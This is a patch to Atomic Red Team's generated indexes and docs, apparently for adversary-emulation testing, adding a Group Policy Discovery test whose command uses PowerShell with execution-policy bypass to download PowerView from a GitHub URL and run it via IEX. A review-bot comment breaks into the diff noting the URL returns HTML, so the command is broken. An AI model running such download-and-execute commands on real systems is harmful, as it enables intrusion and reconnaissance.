From 059297cef55d205de1b653b2c04a196d40e4cb5d Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Tue, 26 Apr 2022 21:42:55 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 11 +++++++
 atomics/T1615/T1615.md | 30 +++++++++++++++++++
 6 files changed, 45 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f31c8557..1b761e90 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -870,6 +870,7 @@ discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
+discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 4161ea34..7012fcde 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -605,6 +605,7 @@ discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd
 discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
+discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3d2b65a9..c4989d1c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1390,6 +1390,7 @@
 - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
 - [T1615 Group Policy Discovery](../../T1615/T1615.md)
 - Atomic Test #1: Display group policy information via gpresult [windows]
+ - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
 - Atomic Test #1: Enumerate all accounts (Local) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index f0f4f52f..636c40c5 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1002,6 +1002,7 @@ - Atomic Test #5: Simulating MAZE Directory Enumeration [windows] - [T1615 Group Policy Discovery](../../T1615/T1615.md) - Atomic Test #1: Display group policy information via gpresult [windows] + - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows] - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e6cba7ed..b313d820 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -59123,6 +59123,17 @@ discovery: command: 'gpresult /z ' + - name: Get-DomainGPO to display group policy information via PowerView + auto_generated_guid: 4e524c4e-0e02-49aa-8df5-93f3f7959b9f + description: Use PowerView to Get-DomainGPO This will only work on Windows 10 + Enterprise and A DC Windows 2019. + supported_platforms: + - windows + executor: + command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); + Get-DomainGPO" + name: powershell + elevation_required: true T1016.001: technique: object_marking_refs: diff --git a/atomics/T1615/T1615.md b/atomics/T1615/T1615.md index 4e3c43ba..ad99860f 100644 --- a/atomics/T1615/T1615.md +++ b/atomics/T1615/T1615.md 
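Review bot: The `command` of the new T1615 test in the index.yaml hunk fetches a `github.com/.../blob/...` URL, which serves the HTML file viewer rather than the script, so `IEX` will not define `Get-DomainGPO`. The run would then record only download-cradle telemetry, not the group-policy enumeration the test is indexed under. Point it at the raw-content URL for the same pinned commit, keeping the commit hash so the fetched code stays fixed. `elevation_required: true` also looks unnecessary for a read-only directory query and is worth confirming. This file is generated, so the change presumably belongs in the atomic's source definition, which is not part of this patch.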
@@ -8,6 +8,8 @@ Adversaries may use commands such as gpresult or various publicly a - [Atomic Test #1 - Display group policy information via gpresult](#atomic-test-1---display-group-policy-information-via-gpresult) +- [Atomic Test #2 - Get-DomainGPO to display group policy information via PowerView](#atomic-test-2---get-domaingpo-to-display-group-policy-information-via-powerview) +
@@ -40,4 +42,32 @@ gpresult /z +
+
+ +## Atomic Test #2 - Get-DomainGPO to display group policy information via PowerView +Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 4e524c4e-0e02-49aa-8df5-93f3f7959b9f + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO" +``` + + + + + +